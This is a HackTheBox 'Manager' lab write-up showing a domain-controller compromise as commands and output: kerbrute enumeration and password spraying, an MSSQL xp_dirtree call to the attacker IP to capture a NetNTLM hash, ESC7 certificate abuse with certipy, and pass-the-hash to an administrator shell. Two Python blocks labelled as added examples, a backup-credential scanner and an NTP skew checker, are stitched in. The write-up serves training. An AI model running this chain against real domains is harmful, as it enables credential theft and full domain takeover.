Manager on HackTheBox

Before all

The most important lesson from this box: whenever you meet AD, sync your clock with the DC's NTP first.

Attacker’s IP: 10.10.16.4
Victim’s IP: 10.10.11.236
Victim’s Host: manager.htb

RECON

port scan

Open services: kerberos, dns, http(80), mssql, smb, winrm

┌──(kali🐳kali)-[~/ctf/hackthebox]
└─$ rustscan -a 10.10.11.236 --ulimit 5000 -- -sC -sV -Pn
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
Real hackers hack time ⌛

[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.10.11.236:53
Open 10.10.11.236:80
Open 10.10.11.236:88
Open 10.10.11.236:135
Open 10.10.11.236:139
Open 10.10.11.236:389
Open 10.10.11.236:445
Open 10.10.11.236:464
Open 10.10.11.236:593
Open 10.10.11.236:636
Open 10.10.11.236:1433
Open 10.10.11.236:3269
Open 10.10.11.236:3268
Open 10.10.11.236:5985
Open 10.10.11.236:9389
Open 10.10.11.236:49667
Open 10.10.11.236:49690
Open 10.10.11.236:49693
Open 10.10.11.236:49689
Open 10.10.11.236:49724
Open 10.10.11.236:49742
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -sC -sV -Pn" on ip 10.10.11.236
Depending on the complexity of the script, results may take some time to appear.
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Warning: Hit PCRE_ERROR_MATCHLIMIT when probing for service http with the regex '^HTTP/1\.1 \d\d\d (?:[^\r\n]*\r\n(?!\r\n))*?.*\r\nServer: Virata-EmWeb/R([\d_]+)\r\nContent-Type: text/html; ?charset=UTF-8\r\nExpires: .*<title>HP (Color |)LaserJet ([\w._ -]+)&nbsp;&nbsp;&nbsp;'
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-26 22:11 EDT
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 22:11
Completed NSE at 22:11, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 22:11
Completed NSE at 22:11, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 22:11
Completed NSE at 22:11, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 22:11
Completed Parallel DNS resolution of 1 host. at 22:11, 0.05s elapsed
DNS resolution of 1 IPs took 0.05s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 22:11
Scanning 10.10.11.236 [21 ports]
Discovered open port 53/tcp on 10.10.11.236
Discovered open port 445/tcp on 10.10.11.236
Discovered open port 80/tcp on 10.10.11.236
Discovered open port 49742/tcp on 10.10.11.236
Discovered open port 135/tcp on 10.10.11.236
Discovered open port 49689/tcp on 10.10.11.236
Discovered open port 139/tcp on 10.10.11.236
Discovered open port 49724/tcp on 10.10.11.236
Discovered open port 464/tcp on 10.10.11.236
Discovered open port 49693/tcp on 10.10.11.236
Discovered open port 3268/tcp on 10.10.11.236
Discovered open port 5985/tcp on 10.10.11.236
Discovered open port 636/tcp on 10.10.11.236
Discovered open port 389/tcp on 10.10.11.236
Discovered open port 593/tcp on 10.10.11.236
Discovered open port 49667/tcp on 10.10.11.236
Discovered open port 9389/tcp on 10.10.11.236
Discovered open port 88/tcp on 10.10.11.236
Discovered open port 3269/tcp on 10.10.11.236
Discovered open port 1433/tcp on 10.10.11.236
Discovered open port 49690/tcp on 10.10.11.236
Completed SYN Stealth Scan at 22:11, 0.99s elapsed (21 total ports)
Initiating Service scan at 22:11
Scanning 21 services on 10.10.11.236
Completed Service scan at 22:12, 62.29s elapsed (21 services on 1 host)
NSE: Script scanning 10.10.11.236.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 22:12
NSE Timing: About 99.97% done; ETC: 22:13 (0:00:00 remaining)
Completed NSE at 22:13, 41.45s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 22:13
Completed NSE at 22:13, 4.49s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 22:13
Completed NSE at 22:13, 0.00s elapsed
Nmap scan report for 10.10.11.236
Host is up, received user-set (0.45s latency).
Scanned at 2025-07-26 22:11:34 EDT for 110s

PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-title: Manager
|_http-server-header: Microsoft-IIS/10.0
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-07-27 09:11:44Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.manager.htb
| Issuer: commonName=manager-DC01-CA/domainComponent=manager
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-30T17:08:51
| Not valid after: 2122-07-27T10:31:04
| MD5: bc56:af22:5a3d:db67:c9bb:a439:4232:14d1
| SHA-1: 2b6d:98b3:d379:df64:59f6:c665:d4b7:53b0:faf6:e07a
| -----BEGIN CERTIFICATE-----
...... <SNIP> ......
|_-----END CERTIFICATE-----
|_ssl-date: 2025-07-27T09:13:24+00:00; +7h00m01s from scanner time.
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-07-27T09:13:22+00:00; +7h00m01s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.manager.htb
| Issuer: commonName=manager-DC01-CA/domainComponent=manager
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-30T17:08:51
| Not valid after: 2122-07-27T10:31:04
| MD5: bc56:af22:5a3d:db67:c9bb:a439:4232:14d1
| SHA-1: 2b6d:98b3:d379:df64:59f6:c665:d4b7:53b0:faf6:e07a
| -----BEGIN CERTIFICATE-----
...... <SNIP> ......
|_-----END CERTIFICATE-----
|_ssl-date: 2025-07-27T09:13:24+00:00; +7h00m01s from scanner time.
| ms-sql-ntlm-info:
| 10.10.11.236:1433:
| Target_Name: MANAGER
| NetBIOS_Domain_Name: MANAGER
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: manager.htb
| DNS_Computer_Name: dc01.manager.htb
| DNS_Tree_Name: manager.htb
|_ Product_Version: 10.0.17763
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.manager.htb
| Issuer: commonName=manager-DC01-CA/domainComponent=manager
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-30T17:08:51
| Not valid after: 2122-07-27T10:31:04
| MD5: bc56:af22:5a3d:db67:c9bb:a439:4232:14d1
| SHA-1: 2b6d:98b3:d379:df64:59f6:c665:d4b7:53b0:faf6:e07a
| -----BEGIN CERTIFICATE-----
...... <SNIP> ......
|_-----END CERTIFICATE-----
|_ssl-date: 2025-07-27T09:13:22+00:00; +7h00m01s from scanner time.
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49689/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49690/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49693/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49724/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49742/tcp open unknown syn-ack ttl 127
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows


Exploit

Kerbrute username enum

$ kerbrute userenum --dc manager.htb -d manager.htb userlist.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 07/26/25 - Ronnie Flathers @ropnop
2025/07/26 22:42:29 > Using KDC(s):
2025/07/26 22:42:29 > manager.htb:88
2025/07/26 22:42:51 > [+] VALID USERNAME: [email protected]
2025/07/26 22:50:02 > [+] VALID USERNAME: [email protected]
2025/07/26 23:02:41 > [+] VALID USERNAME: [email protected]
2025/07/26 23:15:05 > [+] VALID USERNAME: [email protected]
2025/07/26 23:18:20 > [+] VALID USERNAME: [email protected]
2025/07/26 23:19:31 > [+] VALID USERNAME: [email protected]
2025/07/26 23:26:44 > Done! Tested 81475 usernames (6 valid) in 2655.686 seconds

Tried a password spray and found that the operator account reuses its username as its password.

kerbrute passwordspray userlist.txt --user-as-pass

Got operator's password: operator

Abuse MSSQL xp_dirtree

The moment you see MSSQL, the first move is to go for a NetNTLM hash.

┌──(kali🐳kali)-[/tmp/cme_spider_plus]
└─$ impacket-mssqlclient [email protected] -windows-auth
/home/kali/.local/lib/python3.13/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import pkg_resources
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

Password:
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (MANAGER\Operator guest@master)> SELECT name FROM sys.databases;
name
------
master

tempdb

model

msdb

SQL (MANAGER\Operator guest@master)> EXEC master..xp_dirtree '\\10.10.16.4\share\';

On the attacking machine:

$ responder -I tun0

image
It is DC01$'s hash directly; unfortunately the password could not be recovered, and it is not the computer name either.

list dir

......
SQL (MANAGER\Operator guest@master)> EXEC master..xp_dirtree 'C:\inetpub\wwwroot',1,1;
subdirectory depth file
------------------------------- ----- ----
about.html 1 1

contact.html 1 1

css 1 0

images 1 0

index.html 1 1

js 1 0

service.html 1 1

web.config 1 1

website-backup-27-07-23-old.zip 1 1

After some digging, I found a backup zip under the web root.
Downloaded and unzipped it; raven's password is in .old-conf.xml:

...... <SNIP> ......
<password>R4v3nBe5tD3veloP3r!123</password>
...... <SNIP> ......
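The finding above (a backup archive left in the web root whose XML config carries a plaintext password) is a hygiene check a defender can automate. The following is an added example, not code from the original writeup: it walks a web root, opens every zip, parses XML-like entries, and reports which archive, file and element name look like a credential, without echoing the secret itself. The archive and config contents used in the offline demo are constructed here (with a placeholder password), and the set of tag names treated as secrets is my choice.

```python
"""Flag backup archives in a web root whose XML/.config entries carry credentials."""
import io
import os
import zipfile
import xml.etree.ElementTree as ET

ARCHIVE_SUFFIXES = (".zip",)
CONFIG_SUFFIXES = (".xml", ".config")
# Element names treated as credential carriers (assumption; extend as needed).
SECRET_TAGS = {"password", "pwd", "passwd", "connectionstring"}


def secret_tags_in_xml(data: bytes):
    """Yield the (namespace-stripped, lowercased) tag of every non-empty secret element."""
    try:
        root = ET.fromstring(data)
    except ET.ParseError:
        return  # not XML (or malformed): nothing to report
    for elem in root.iter():
        tag = elem.tag.rsplit("}", 1)[-1].lower()  # drop any {namespace} prefix
        if tag in SECRET_TAGS and (elem.text or "").strip():
            yield tag


def scan_archive(zip_bytes: bytes, archive_name: str):
    """Return (archive, entry, tag) triples; the secret value is deliberately not returned."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            name = info.filename
            base = os.path.basename(name)
            # Config files, including dot-prefixed ones such as .old-conf.xml
            if info.is_dir() or not (name.lower().endswith(CONFIG_SUFFIXES) or base.startswith(".")):
                continue
            for tag in secret_tags_in_xml(zf.read(name)):
                findings.append((archive_name, name, tag))
    return findings


def scan_webroot(path: str):
    """Walk a web root (e.g. C:\\inetpub\\wwwroot) and scan every archive found."""
    findings = []
    for dirpath, _, files in os.walk(path):
        for fn in files:
            if fn.lower().endswith(ARCHIVE_SUFFIXES):
                full = os.path.join(dirpath, fn)
                with open(full, "rb") as fh:
                    findings.extend(scan_archive(fh.read(), full))
    return findings


def constructed_backup() -> bytes:
    """Constructed sample archive mirroring the layout found on the box (placeholder secret)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("index.html", "<html><body>Manager</body></html>")
        zf.writestr(".old-conf.xml",
                    "<config><user>raven</user><password>PLACEHOLDER</password></config>")
    return buf.getvalue()


if __name__ == "__main__":
    for hit in scan_archive(constructed_backup(), "website-backup-27-07-23-old.zip"):
        print("credential-bearing element:", hit)
```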

USER GET !

ESC 7

evil-winrm -i 10.10.11.236 -u raven -p 'R4v3nBe5tD3veloP3r!123'

Connect with evil-winrm first.

The current user has AD CS permissions.

*Evil-WinRM* PS C:\Users\Raven\DESKTOP> whoami /all

USER INFORMATION
----------------

User Name SID
============= ==============================================
manager\raven S-1-5-21-4078382237-1492182817-2568127209-1116


GROUP INFORMATION
-----------------

Group Name Type SID Attributes
=========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448


PRIVILEGES INFORMATION
----------------------

Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.

Scanning with certipy-ad reveals the ESC7 vulnerability: a user holding this permission can add a new template and impersonate an arbitrary user to obtain a certificate.

┌──(venv)─(kali🐳kali)-[~/ctf]
└─$ certipy-ad find -u raven -p 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10.11.236 -stdout -vulnerable
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Finding issuance policies
[*] Found 13 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'manager-DC01-CA' via RRP
[*] Successfully retrieved CA configuration for 'manager-DC01-CA'
[*] Checking web enrollment for CA 'manager-DC01-CA' @ 'dc01.manager.htb'
[!] Failed to check Web Enrollment for CA 'manager-DC01-CA': module 'collections' has no attribute 'MutableSet'
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Certificate Authorities
0
CA Name : manager-DC01-CA
DNS Name : dc01.manager.htb
Certificate Subject : CN=manager-DC01-CA, DC=manager, DC=htb
Certificate Serial Number : 5150CE6EC048749448C7390A52F264BB
Certificate Validity Start : 2023-07-27 10:21:05+00:00
Certificate Validity End : 2122-07-27 10:31:04+00:00
Web Enrollment
HTTP
Enabled : Unknown
HTTPS
Enabled : Unknown
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Active Policy : CertificateAuthority_MicrosoftDefault.Policy
Permissions
Owner : MANAGER.HTB\Administrators
Access Rights
Enroll : MANAGER.HTB\Operator
MANAGER.HTB\Authenticated Users
MANAGER.HTB\Raven
ManageCa : MANAGER.HTB\Administrators
MANAGER.HTB\Domain Admins
MANAGER.HTB\Enterprise Admins
MANAGER.HTB\Raven
ManageCertificates : MANAGER.HTB\Administrators
MANAGER.HTB\Domain Admins
MANAGER.HTB\Enterprise Admins
[+] User Enrollable Principals : MANAGER.HTB\Authenticated Users
MANAGER.HTB\Raven
[+] User ACL Principals : MANAGER.HTB\Raven
[!] Vulnerabilities
ESC7 : User has dangerous permissions.
Certificate Templates : [!] Could not find any certificate template

Reference: https://www.rbtsec.com/blog/active-directory-certificate-attack-esc7/

┌──(venv)─(kali🐳kali)-[~/ctf]
└─$ certipy-ad ca -ca manager-DC01-CA -u raven -p 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10.11.236 -add-officer raven
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Successfully added officer 'Raven' on 'manager-DC01-CA'

┌──(venv)─(kali🐳kali)-[~/ctf]
└─$ certipy-ad ca -ca manager-DC01-CA -u raven -p 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10.11.236 -enable-template SubCA
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Successfully enabled 'SubCA' on 'manager-DC01-CA'

┌──(venv)─(kali🐳kali)-[~/ctf]
└─$ certipy-ad req -ca manager-DC01-CA -u raven -p 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10.11.236 -template SubCA -target DC01.manager.htb -upn [email protected]
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Request ID is 21
[-] Got error while requesting certificate: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enroll for this type of certificate.
Would you like to save the private key? (y/N): y
[*] Saving private key to '21.key'
[*] Wrote private key to '21.key'
[-] Failed to request certificate

┌──(venv)─(kali🐳kali)-[~/ctf]
└─$ certipy-ad ca -ca manager-DC01-CA -u raven -p 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10.11.236 -issue-request 21
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Successfully issued certificate request ID 21

┌──(venv)─(kali🐳kali)-[~/ctf]
└─$ certipy-ad req -ca manager-DC01-CA -u raven -p 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10.11.236 -template SubCA -target DC01.manager.htb -upn [email protected] -retrieve 21
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Retrieving certificate with ID 21
[*] Successfully retrieved certificate
[*] Got certificate with UPN '[email protected]'
[*] Certificate has no object SID
[*] Loaded private key from '21.key'
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'

┌──(venv)─(kali🐳kali)-[~/ctf]
└─$ certipy-ad auth -pfx administrator.pfx
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[-] Got error: Could not find a target in the specified options
[-] Use -debug to print a stacktrace

┌──(venv)─(kali🐳kali)-[~/ctf]
└─$ certipy-ad auth -pfx administrator.pfx -dc-ip 10.10.11.236
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*] SAN UPN: '[email protected]'
[*] Using principal: '[email protected]'
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
[-] Use -debug to print a stacktrace
[-] See the wiki for more information

┌──(venv)─(kali🐳kali)-[~/ctf]
└─$ sudo su
┌──(root㉿kali)-[/home/kali/ctf]
└─# timedatectl set-ntp off

┌──(root㉿kali)-[/home/kali/ctf]
└─# rdate -n 10.10.11.236
rdate: Inconsistent times received from NTP server
rdate: Unable to get a reasonable time estimate

┌──(root㉿kali)-[/home/kali/ctf]
└─# rdate -n 10.10.11.236
rdate: Inconsistent times received from NTP server
rdate: Unable to get a reasonable time estimate

┌──(venv)─(kali🐳kali)-[~/ctf]
└─$ certipy-ad auth -pfx administrator.pfx -dc-ip 10.10.11.236
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*] SAN UPN: '[email protected]'
[*] Using principal: '[email protected]'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for '[email protected]': aad3b435b51404eeaad3b435b51404ee:ae5064c2f62317332c88629e025924ef
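The KRB_AP_ERR_SKEW above is the box's main lesson: the DC is +7h00m01s ahead of the scanner (nmap's ssl-date already showed it), and a Windows KDC rejects tickets outside its 5-minute MaxClockSkew. As an added example, not code from the original writeup, here is a small SNTP probe that measures the offset to a host's NTP service and states whether Kerberos will accept it; run with no argument it reproduces the page's 7h00m01s skew offline from a constructed reply packet. The request/reply builders and the verdict wording are mine.

```python
"""Measure clock offset against a DC's NTP service and compare it to Kerberos tolerance."""
import socket
import struct
import sys
import time
from datetime import timedelta

NTP_EPOCH_OFFSET = 2208988800  # seconds between 1900-01-01 (NTP epoch) and 1970-01-01 (Unix)
KERBEROS_MAX_SKEW = 300        # Windows KDC default MaxClockSkew: 5 minutes


def build_sntp_request() -> bytes:
    """48-byte client request: LI=0, VN=4, Mode=3, all other fields zero."""
    return b"\x23" + b"\x00" * 47


def parse_transmit_time(packet: bytes) -> float:
    """Server transmit timestamp (bytes 40..47) converted to Unix time."""
    if len(packet) < 48:
        raise ValueError("short NTP packet")
    secs, frac = struct.unpack("!II", packet[40:48])
    return secs - NTP_EPOCH_OFFSET + frac / 2**32


def clock_offset(packet: bytes, local_now: float) -> float:
    """Server time minus local time in seconds (positive: server is ahead of us)."""
    return parse_transmit_time(packet) - local_now


def kerberos_verdict(offset_seconds: float, max_skew: int = KERBEROS_MAX_SKEW) -> str:
    """Human-readable skew, phrased like nmap's ssl-date, plus the Kerberos consequence."""
    sign = "+" if offset_seconds >= 0 else "-"
    skew = timedelta(seconds=round(abs(offset_seconds)))
    if abs(offset_seconds) > max_skew:
        return f"{sign}{skew} from local time: exceeds Kerberos tolerance, expect KRB_AP_ERR_SKEW"
    return f"{sign}{skew} from local time: within Kerberos tolerance"


def query_host(host: str, timeout: float = 3.0) -> float:
    """Send one SNTP request to UDP/123 on the host and return the offset in seconds."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(build_sntp_request(), (host, 123))
        data, _ = sock.recvfrom(48)
    return clock_offset(data, time.time())


def constructed_reply(server_unix_time: float) -> bytes:
    """Constructed server reply (Mode=4) carrying the given transmit time, for offline use."""
    secs = int(server_unix_time) + NTP_EPOCH_OFFSET
    frac = int((server_unix_time % 1) * 2**32)
    return b"\x24" + b"\x00" * 39 + struct.pack("!II", secs, frac)


if __name__ == "__main__":
    if len(sys.argv) > 1:
        print(kerberos_verdict(query_host(sys.argv[1])))
    else:
        now = time.time()  # offline demo: the +7h00m01s the DC showed in the scan
        print(kerberos_verdict(clock_offset(constructed_reply(now + 7 * 3600 + 1), now)))
```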

Pass-the-Hash to finish this one.

┌──(venv)─(kali🐳kali)-[~/ctf]
└─$ evil-winrm -i 10.10.11.236 -u administrator -H ae5064c2f62317332c88629e025924ef


Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> ls
cd ..\

Directory: C:\Users\Administrator\Documents


Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 7/29/2023 8:09 AM WindowsPowerShell


DESKTOP
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..\DESKTOP
*Evil-WinRM* PS C:\Users\Administrator\DESKTOP> CAT ROOT.TXT
69b7f90ce68cb9621c18f5ccd7c211e5